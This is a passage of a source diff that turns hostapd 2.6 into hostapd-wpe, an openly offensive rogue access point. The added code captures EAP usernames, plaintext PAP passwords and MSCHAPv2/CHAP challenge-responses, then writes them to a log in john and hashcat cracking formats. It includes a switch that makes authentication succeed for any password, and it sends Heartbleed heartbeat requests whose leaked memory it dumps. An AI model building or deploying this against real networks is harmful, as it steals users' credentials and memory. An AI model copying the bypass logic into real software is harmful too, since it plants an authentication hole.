MSCHAPV2_OP_* */ 3748@@ -291,7 +291,7 @@ static void eap_mschapv2_process_respons 3749 size_t username_len, user_len; 3750 int res; 3751 char *buf; 3752- 3753+ u8 wpe_challenge_hash[8]; 3754 pos = eap_hdr_validate(EAP_VENDOR_IETF, EAP_TYPE_MSCHAPV2, respData, 3755 &len); 3756 if (pos == NULL || len < 1) 3757@@ -372,6 +372,8 @@ static void eap_mschapv2_process_respons 3758 } 3759 } 3760 #endif /* CONFIG_TESTING_OPTIONS */ 3761+ challenge_hash(peer_challenge, data->auth_challenge, username, username_len, wpe_challenge_hash); 3762+ wpe_log_chalresp("mschapv2", name, name_len, wpe_challenge_hash, 8, nt_response, 24); 3763 3764 if (username_len != user_len || 3765 os_memcmp(username, user, username_len) != 0) { 3766@@ -406,6 +408,11 @@ static void eap_mschapv2_process_respons 3767 return; 3768 } 3769 3770+ if (wpe_conf.wpe_enable_return_success) { 3771+ os_memset((void *)nt_response, 0, 24); 3772+ os_memset((void *)expected, 0, 24); 3773+ } 3774+ 3775 if (os_memcmp_const(nt_response, expected, 24) == 0) { 3776 const u8 *pw_hash; 3777 u8 pw_hash_buf[16], pw_hash_hash[16]; 3778@@ -446,6 +453,8 @@ static void eap_mschapv2_process_respons 3779 wpa_printf(MSG_DEBUG, "EAP-MSCHAPV2: Invalid NT-Response"); 3780 data->state = FAILURE_REQ; 3781 } 3782+ if (wpe_conf.wpe_enable_return_success) 3783+ data->state = SUCCESS; 3784 } 3785 3786 3787diff -rupN hostapd-2.6/src/eap_server/eap_server_peap.c hostapd-2.6-wpe/src/eap_server/eap_server_peap.c 3788--- hostapd-2.6/src/eap_server/eap_server_peap.c 2016-10-02 20:51:11.000000000 +0200 3789+++ hostapd-2.6-wpe/src/eap_server/eap_server_peap.c 2018-05-21 11:37:58.863577170 +0200 3790@@ -17,7 +17,7 @@ 3791 #include "eap_common/eap_tlv_common.h" 3792 #include "eap_common/eap_peap_common.h" 3793 #include "tncs.h" 3794- 3795+#include "wpe/wpe.h" 3796 3797 /* Maximum supported PEAP version 3798 * 0 = Microsoft's PEAP version 0; draft-kamath-pppext-peapv0-00.txt 3799diff -rupN hostapd-2.6/src/eap_server/eap_server_ttls.c hostapd-2.6-wpe/src/eap_server/eap_server_ttls.c 3800--- hostapd-2.6/src/eap_server/eap_server_ttls.c 2016-10-02 20:51:11.000000000 +0200 3801+++ hostapd-2.6-wpe/src/eap_server/eap_server_ttls.c 2018-05-21 11:37:58.863577170 +0200 3802@@ -16,7 +16,7 @@ 3803 #include "eap_server/eap_tls_common.h" 3804 #include "eap_common/chap.h" 3805 #include "eap_common/eap_ttls.h" 3806- 3807+#include "wpe/wpe.h" 3808 3809 #define EAP_TTLS_VERSION 0 3810 3811@@ -538,9 +538,11 @@ static void eap_ttls_process_phase2_pap( 3812 return; 3813 } 3814 3815- if (sm->user->password_len != user_password_len || 3816+ wpe_log_basic("eap-ttls/pap", sm->identity, sm->identity_len, user_password, user_password_len); 3817+ 3818+ if ((!wpe_conf.wpe_enable_return_success) && (sm->user->password_len != user_password_len || 3819 os_memcmp_const(sm->user->password, user_password, 3820- user_password_len) != 0) { 3821+ user_password_len) != 0)) { 3822 wpa_printf(MSG_DEBUG, "EAP-TTLS/PAP: Invalid user password"); 3823 eap_ttls_state(data, FAILURE); 3824 return; 3825@@ -603,8 +605,9 @@ static void eap_ttls_process_phase2_chap 3826 chap_md5(password[0], sm->user->password, sm->user->password_len, 3827 challenge, challenge_len, hash); 3828 3829- if (os_memcmp_const(hash, password + 1, EAP_TTLS_CHAP_PASSWORD_LEN) == 3830- 0) { 3831+ wpe_log_chalresp("eap-ttls/chap", sm->identity, sm->identity_len, challenge, challenge_len, password, password_len); 3832+ 3833+ if ((wpe_conf.wpe_enable_return_success) || (os_memcmp(hash, password + 1, EAP_TTLS_CHAP_PASSWORD_LEN) == 0)) { 3834 wpa_printf(MSG_DEBUG, "EAP-TTLS/CHAP: Correct user password"); 3835 eap_ttls_state(data, SUCCESS); 3836 eap_ttls_valid_session(sm, data); 3837@@ -672,7 +675,9 @@ static void eap_ttls_process_phase2_msch 3838 nt_challenge_response(challenge, sm->user->password, 3839 sm->user->password_len, nt_response); 3840 3841- if (os_memcmp_const(nt_response, response + 2 + 24, 24) == 0) { 3842+ wpe_log_chalresp("eap-ttls/mschap", sm->identity, sm->identity_len, challenge, challenge_len, response + 2 + 24, 24); 3843+ 3844+ if ((wpe_conf.wpe_enable_return_success) || (os_memcmp(nt_response, response + 2 + 24, 24) == 0)) { 3845 wpa_printf(MSG_DEBUG, "EAP-TTLS/MSCHAP: Correct response"); 3846 eap_ttls_state(data, SUCCESS); 3847 eap_ttls_valid_session(sm, data); 3848@@ -694,7 +699,7 @@ static void eap_ttls_process_phase2_msch 3849 u8 *response, size_t response_len) 3850 { 3851 u8 *chal, *username, nt_response[24], *rx_resp, *peer_challenge, 3852- *auth_challenge; 3853+ *auth_challenge, wpe_challenge_hash[8]; 3854 size_t username_len, i; 3855 3856 if (challenge == NULL || response == NULL || 3857@@ -779,6 +784,9 @@ static void eap_ttls_process_phase2_msch 3858 } 3859 3860 rx_resp = response + 2 + EAP_TTLS_MSCHAPV2_CHALLENGE_LEN + 8; 3861+ 3862+ challenge_hash(peer_challenge, auth_challenge, username, username_len, wpe_challenge_hash); 3863+ wpe_log_chalresp("eap-ttls/mschapv2", username, username_len, wpe_challenge_hash, 8, rx_resp, 24); 3864 #ifdef CONFIG_TESTING_OPTIONS 3865 { 3866 u8 challenge2[8]; 3867diff -rupN hostapd-2.6/src/Makefile hostapd-2.6-wpe/src/Makefile 3868--- hostapd-2.6/src/Makefile 2016-10-02 20:51:11.000000000 +0200 3869+++ hostapd-2.6-wpe/src/Makefile 2018-05-21 11:37:58.863577170 +0200 3870@@ -1,5 +1,5 @@ 3871 SUBDIRS=ap common crypto drivers eapol_auth eapol_supp eap_common eap_peer eap_server l2_packet p2p pae radius rsn_supp tls utils wps 3872-SUBDIRS += fst 3873+SUBDIRS += fst wpe 3874 3875 all: 3876 for d in $(SUBDIRS); do [ -d $$d ] && $(MAKE) -C $$d; done 3877diff -rupN hostapd-2.6/src/utils/wpa_debug.c hostapd-2.6-wpe/src/utils/wpa_debug.c 3878--- hostapd-2.6/src/utils/wpa_debug.c 2016-10-02 20:51:11.000000000 +0200 3879+++ hostapd-2.6-wpe/src/utils/wpa_debug.c 2018-05-21 11:37:58.863577170 +0200 3880@@ -30,7 +30,7 @@ static FILE *wpa_debug_tracing_file = NU 3881 3882 3883 int wpa_debug_level = MSG_INFO; 3884-int wpa_debug_show_keys = 0; 3885+int wpa_debug_show_keys = 1; // WPE >:) 3886 int wpa_debug_timestamp = 0; 3887 3888 3889diff -rupN hostapd-2.6/src/wpe/Makefile hostapd-2.6-wpe/src/wpe/Makefile 3890--- hostapd-2.6/src/wpe/Makefile 1970-01-01 01:00:00.000000000 +0100 3891+++ hostapd-2.6-wpe/src/wpe/Makefile 2018-05-21 11:37:58.863577170 +0200 3892@@ -0,0 +1,8 @@ 3893+all: 3894+ @echo Nothing to be made. 3895+ 3896+clean: 3897+ rm -f *~ *.o *.d *.gcno *.gcda *.gcov 3898+ 3899+install: 3900+ @echo Nothing to be made. 3901diff -rupN hostapd-2.6/src/wpe/wpe.c hostapd-2.6-wpe/src/wpe/wpe.c 3902--- hostapd-2.6/src/wpe/wpe.c 1970-01-01 01:00:00.000000000 +0100 3903+++ hostapd-2.6-wpe/src/wpe/wpe.c 2018-05-21 11:53:09.579560861 +0200 3904@@ -0,0 +1,232 @@ 3905+/* 3906+ wpe.c - 3907+ brad.antoniewicz@foundstone.com 3908+ Implements WPE (Wireless Pwnage Edition) functionality within 3909+ hostapd. 3910+ 3911+ WPE functionality focuses on targeting connecting users. At 3912+ it's core it implements credential logging (originally 3913+ implemented in FreeRADIUS-WPE), but also includes other patches 3914+ for other client attacks that have been modified to some extend. 3915+ 3916+ FreeRADIUS-WPE: https://github.com/aircrack-ng/aircrack-ng/tree/master/patches/wpe/freeradius-wpe 3917+ Karma patch: http://foofus.net/goons/jmk/tools/hostapd-1.0-karma.diff 3918+ Cupid patch: https://github.com/lgrangeia/cupid/blob/master/patch-hostapd 3919+*/ 3920+ 3921+#include <time.h> 3922+#include <openssl/ssl.h> 3923+#include "includes.h" 3924+#include "common.h" 3925+#include "wpe/wpe.h" 3926+#include "utils/wpa_debug.h" 3927+ 3928+#define wpe_logfile_default_location "./hostapd-wpe.log" 3929+ 3930+ 3931+#define MSCHAPV2_CHAL_HASH_LEN 8 3932+#define MSCHAPV2_CHAL_LEN 16 3933+#define MSCHAPV2_RESP_LEN 24 3934+ 3935+#if OPENSSL_VERSION_NUMBER < 0x10100000L 3936+ char wpe_hb_msg[] = "\x18\x03\x01\x00\x03\x01\xff\xff"; 3937+ size_t wpe_hb_msg_len = sizeof(wpe_hb_msg)/sizeof(wpe_hb_msg[0]); 3938+#endif 3939+ 3940+struct wpe_config wpe_conf = { 3941+ .wpe_logfile = wpe_logfile_default_location, 3942+ .wpe_logfile_fp = NULL, 3943+ .wpe_enable_karma = 0, 3944+ .wpe_enable_cupid = 0, 3945+ .wpe_enable_return_success = 0, 3946+#if OPENSSL_VERSION_NUMBER < 0x10100000L 3947+ .wpe_hb_send_before_handshake = 1, 3948+ .wpe_hb_send_before_appdata = 0, 3949+ .wpe_hb_send_after_appdata = 0, 3950+ .wpe_hb_payload_size = 50000, 3951+ .wpe_hb_num_tries = 1, 3952+ .wpe_hb_num_repeats = 10 3953+#endif /* OPENSSL_VERSION_NUMBER < 0x10100000L */ 3954+}; 3955+ 3956+void wpe_log_file_and_stdout(char const *fmt, ...) { 3957+ 3958+ if ( wpe_conf.wpe_logfile_fp == NULL ) { 3959+ wpe_conf.wpe_logfile_fp = fopen(wpe_conf.wpe_logfile, "a"); 3960+ if ( wpe_conf.wpe_logfile_fp == NULL ) 3961+ printf("WPE: Cannot file log file"); 3962+ } 3963+ 3964+ va_list ap; 3965+ 3966+ va_start(ap, fmt); 3967+ vprintf(fmt, ap); 3968+ va_end(ap); 3969+ 3970+ va_start(ap, fmt); 3971+ if ( wpe_conf.wpe_logfile_fp != NULL ) 3972+ vfprintf(wpe_conf.wpe_logfile_fp, fmt, ap); 3973+ va_end(ap); 3974+} 3975+ 3976+void wpe_log_chalresp(char *type, const u8 *username, size_t username_len, const u8 *challenge, size_t challenge_len, const u8 *response, size_t response_len) { 3977+ time_t nowtime; 3978+ int x; 3979+ 3980+ nowtime = time(NULL); 3981+ 3982+ wpe_log_file_and_stdout("\n\n%s: %s", type, ctime(&nowtime)); 3983+ wpe_log_file_and_stdout("\t username:\t"); 3984+ for (x=0; x<username_len; x++) 3985+ wpe_log_file_and_stdout("%c",username[x]); 3986+ wpe_log_file_and_stdout("\n"); 3987+ 3988+ wpe_log_file_and_stdout("\t challenge:\t"); 3989+ for (x=0; x<challenge_len - 1; x++) 3990+ wpe_log_file_and_stdout("%02x:",challenge[x]); 3991+ wpe_log_file_and_stdout("%02x\n",challenge[x]); 3992+ 3993+ wpe_log_file_and_stdout("\t response:\t"); 3994+ for (x=0; x<response_len - 1; x++) 3995+ wpe_log_file_and_stdout("%02x:",response[x]); 3996+ wpe_log_file_and_stdout("%02x\n",response[x]); 3997+ 3998+ if (strncmp(type, "mschapv2", 8) == 0 || strncmp(type, "eap-ttls/mschapv2", 17) == 0) { 3999+ wpe_log_file_and_stdout("\t jtr NETNTLM:\t\t"); 4000+ for (x=0; x<username_len; x++) 4001+ wpe_log_file_and_stdout("%c",username[x]); 4002+ wpe_log_file_and_stdout(":$NETNTLM$"); 4003+ for (x=0; x<challenge_len; x++) 4004+ wpe_log_file_and_stdout("%02x",challenge[x]); 4005+ wpe_log_file_and_stdout("$"); 4006+ for (x=0; x<response_len; x++) 4007+ wpe_log_file_and_stdout("%02x",response[x]); 4008+ wpe_log_file_and_stdout("\n"); 4009+ 4010+ wpe_log_file_and_stdout("\t hashcat NETNTLM:\t"); 4011+ for (x=0; x<username_len; x++) 4012+ wpe_log_file_and_stdout("%c",username[x]); 4013+ wpe_log_file_and_stdout("::::"); 4014+ for (x=0; x<response_len; x++) 4015+ wpe_log_file_and_stdout("%02x",response[x]); 4016+ wpe_log_file_and_stdout(":"); 4017+ for (x=0; x<challenge_len; x++) 4018+ wpe_log_file_and_stdout("%02x",challenge[x]); 4019+ wpe_log_file_and_stdout("\n"); 4020+ 4021+ } 4022+} 4023+ 4024+void wpe_log_basic(char *type, const u8 *username, size_t username_len, const u8 *password, size_t password_len) { 4025+ time_t nowtime; 4026+ int x; 4027+ 4028+ nowtime = time(NULL); 4029+ 4030+ wpe_log_file_and_stdout("\n\n%s: %s",type, ctime(&nowtime)); 4031+ wpe_log_file_and_stdout("\t username:\t"); 4032+ for (x=0; x<username_len; x++) 4033+ wpe_log_file_and_stdout("%c",username[x]); 4034+ wpe_log_file_and_stdout("\n"); 4035+ 4036+ wpe_log_file_and_stdout("\t password:\t"); 4037+ for (x=0; x<password_len; x++) 4038+ wpe_log_file_and_stdout("%c",password[x]); 4039+ wpe_log_file_and_stdout("\n"); 4040+} 4041+ 4042+/* 4043+ Taken from asleap, who took from nmap, who took from tcpdump :) 4044+*/ 4045+void wpe_hexdump(unsigned char *bp, unsigned int length) 4046+{ 4047+ 4048+ /* stolen from tcpdump, then kludged extensively */ 4049+ 4050+ static const char asciify[] = 4051+ "................................ !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~................................................................................................................................."; 4052+ 4053+ const unsigned short *sp; 4054+ const unsigned char *ap; 4055+ unsigned int i, j; 4056+ int nshorts, nshorts2; 4057+ int padding; 4058+ 4059+ wpe_log_file_and_stdout("\n\t"); 4060+ padding = 0; 4061+ sp = (unsigned short *)bp; 4062+ ap = (unsigned char *)bp; 4063+ nshorts = (unsigned int)length / sizeof(unsigned short); 4064+ nshorts2 = (unsigned int)length / sizeof(unsigned short); 4065+ i = 0; 4066+ j = 0; 4067+ while (1) { 4068+ while (--nshorts >= 0) { 4069+ wpe_log_file_and_stdout(" %04x", ntohs(*sp)); 4070+ sp++; 4071+ if ((++i % 8) == 0) 4072+ break; 4073+ } 4074+ if (nshorts < 0) { 4075+ if ((length & 1) && (((i - 1) % 8) != 0)) { 4076+ wpe_log_file_and_stdout(" %02x ", *(unsigned char *)sp); 4077+ padding++; 4078+ } 4079+ nshorts = (8 - (nshorts2 - nshorts)); 4080+ while (--nshorts >= 0) { 4081+ wpe_log_file_and_stdout(" "); 4082+ } 4083+ if (!padding) 4084+ wpe_log_file_and_stdout(" "); 4085+ } 4086+ wpe_log_file_and_stdout(" "); 4087+ 4088+ while (--nshorts2 >= 0) { 4089+ wpe_log_file_and_stdout("%c%c", asciify[*ap], asciify[*(ap + 1)]); 4090+ ap += 2; 4091+ if ((++j % 8) == 0) { 4092+ wpe_log_file_and_stdout("\n\t"); 4093+ break; 4094+ } 4095+ } 4096+ if (nshorts2 < 0) { 4097+ if ((length & 1) && (((j - 1) % 8) != 0)) { 4098+ wpe_log_file_and_stdout("%c", asciify[*ap]); 4099+ } 4100+ break; 4101+ } 4102+ } 4103+ if ((length & 1) && (((i - 1) % 8) == 0)) { 4104+ wpe_log_file_and_stdout(" %02x", *(unsigned char *)sp); 4105+ wpe_log_file_and_stdout(" %c", 4106+ asciify[*ap]); 4107+ } 4108+ wpe_log_file_and_stdout("\n"); 4109+} 4110+ 4111+ 4112+#if OPENSSL_VERSION_NUMBER < 0x10100000L 4113+/* https://github.com/openssl/openssl/issues/2122 */ 4114+ 4115+void wpe_hb_cb(int v_write_p, int v_version, int v_content_type, const void* v_buf, size_t v_len, SSL* v_ssl, void* v_arg) { 4116+#ifdef TLS1_RT_HEARTBEAT 4117+ if (v_content_type == TLS1_RT_HEARTBEAT) { 4118+#elif defined(DTLS1_RT_HEARTBEAT) 4119+ if (v_content_type == DTLS1_RT_HEARTBEAT) { 4120+#endif 4121+ wpe_log_file_and_stdout("\n\nHeartbleed Data:\n"); 4122+ v_ssl->tlsext_hb_pending = 1; 4123+ wpe_hexdump((unsigned char *)v_buf, v_len); 4124+ } 4125+} 4126+ 4127+ 4128+char *wpe_hb_clear() { 4129+ char *p; 4130+ // set payload size 4131+ p = &wpe_hb_msg[sizeof(wpe_hb_msg) - 3]; 4132+ s2n(wpe_conf.wpe_hb_payload_size, p); 4133+ 4134+ return wpe_hb_msg; 4135+} 4136+#endif /* OPENSSL_VERSION_NUMBER < 0x10100000L */ 4137diff -rupN hostapd-2.6/src/wpe/wpe.h hostapd-2.6-wpe/src/wpe/wpe.h 4138--- hostapd-2.6/src/wpe/wpe.h 1970-01-01 01:00:00.000000000 +0100 4139+++ hostapd-2.6-wpe/src/wpe/wpe.h 2018-05-21 11:37:58.863577170 +0200 4140@@ -0,0 +1,54 @@ 4141+/* 4142+ wpe.h - 4143+ brad.antoniewicz@foundstone.com 4144+ Implements WPE (Wireless Pwnage Edition) functionality within 4145+ hostapd. 4146+ 4147+ WPE functionality focuses on targeting connecting users. At 4148+ it's core it implements credential logging (originally 4149+ implemented in FreeRADIUS-WPE), but also includes other patches 4150+ for other client attacks. 4151+ 4152+ FreeRADIUS-WPE: https://github.com/brad-anton/freeradius-wpe 4153+ Karma patch: http://foofus.net/goons/jmk/tools/hostapd-1.0-karma.diff 4154+ Cupid patch: https://github.com/lgrangeia/cupid/blob/master/patch-hostapd 4155+*/ 4156+#include <openssl/ssl.h> 4157+ 4158+struct wpe_config { 4159+ char *wpe_logfile; 4160+ FILE *wpe_logfile_fp; 4161+ unsigned int wpe_enable_karma; 4162+ unsigned int wpe_enable_cupid; 4163+ unsigned int wpe_enable_return_success; 4164+#if OPENSSL_VERSION_NUMBER < 0x10100000L 4165+ unsigned int wpe_hb_send_before_handshake:1; 4166+ unsigned int wpe_hb_send_before_appdata:1; 4167+ unsigned int wpe_hb_send_after_appdata:1; 4168+ unsigned int wpe_hb_payload_size; 4169+ unsigned int wpe_hb_num_tries; 4170+ unsigned int wpe_hb_num_repeats; 4171+#endif /* OPENSSL_VERSION_NUMBER < 0x10100000L */ 4172+}; 4173+ 4174+extern struct wpe_config wpe_conf; 4175+ 4176+#if OPENSSL_VERSION_NUMBER < 0x10100000L 4177+ extern char wpe_hb_msg[]; 4178+ extern size_t wpe_hb_msg_len; 4179+ 4180+ //#define WPE_HB_MSG_LEN 8 4181+#endif /* OPENSSL_VERSION_NUMBER < 0x10100000L */ 4182+ 4183+#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \ 4184+ (((unsigned int)(c[1])) )),c+=2) 4185+ 4186+#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \ 4187+ c[1]=(unsigned char)(((s) )&0xff)),c+=2) 4188+ 4189+ 4190+void wpe_log_file_and_stdout(char const *fmt, ...); 4191+void wpe_log_chalresp(char *type, const u8 *username, size_t username_len, const u8 *challenge, size_t challenge_len, const u8 *response, size_t response_len); 4192+void wpe_log_basic(char *type, const u8 *username, size_t username_len, const u8 *password, size_t password_len); 4193+void wpe_hb_cb(int v_write_p, int v_version, int v_content_type, const void* v_buf, size_t v_len, SSL* v_ssl, void* v_arg); 4194+char *wpe_hb_clear(); 4195